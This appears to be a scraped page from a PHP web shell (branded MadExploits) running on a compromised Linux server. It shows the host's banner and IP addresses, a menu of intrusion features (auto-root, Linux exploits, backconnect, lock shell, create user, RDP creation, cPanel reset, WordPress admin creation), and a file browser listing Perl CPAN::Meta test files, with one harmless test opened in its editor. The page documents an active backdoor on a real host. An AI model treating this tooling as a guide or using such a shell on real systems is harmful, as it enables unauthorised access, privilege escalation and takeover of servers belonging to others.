Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.22.27.41
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-CPAN-Meta-2.120921 /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
data
[ DIR ]
drwxr-xr-x
data-bad
[ DIR ]
drwxr-xr-x
data-fail
[ DIR ]
drwxr-xr-x
00-compile.t
1.57
KB
-rw-r--r--
converter-bad.t
2.63
KB
-rw-r--r--
converter-fail.t
1.09
KB
-rw-r--r--
converter.t
8.02
KB
-rw-r--r--
load-bad.t
789
B
-rw-r--r--
meta-obj.t
5.7
KB
-rw-r--r--
no-index.t
1.72
KB
-rw-r--r--
prereqs-finalize.t
2.17
KB
-rw-r--r--
prereqs-merge.t
1.94
KB
-rw-r--r--
prereqs.t
2.55
KB
-rw-r--r--
repository.t
4.3
KB
-rw-r--r--
save-load.t
2.85
KB
-rw-r--r--
strings.t
2.26
KB
-rw-r--r--
validator.t
940
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load-bad.t
use strict; use warnings; use Test::More 0.88; use CPAN::Meta; use File::Spec; use IO::Dir; sub _slurp { do { local(@ARGV,$/)=shift(@_); <> } } delete $ENV{$_} for qw/PERL_JSON_BACKEND PERL_YAML_BACKEND/; # use defaults my $data_dir = IO::Dir->new( 't/data-bad' ); my @files = sort grep { /^\w/ } $data_dir->read; for my $f ( sort @files ) { my $path = File::Spec->catfile('t','data-bad',$f); my $meta = eval { CPAN::Meta->load_file( $path, { fix_errors => 1 } ) }; ok( defined $meta, "load_file('$f')" ) or diag $@; my $string = _slurp($path); my $method = $path =~ /\.json/ ? "load_json_string" : "load_yaml_string"; my $meta2 = eval { CPAN::Meta->$method( $string, { fix_errors => 1 } ) }; ok( defined $meta2, "$method(slurp('$f'))" ) or diag $@; } done_testing;
Close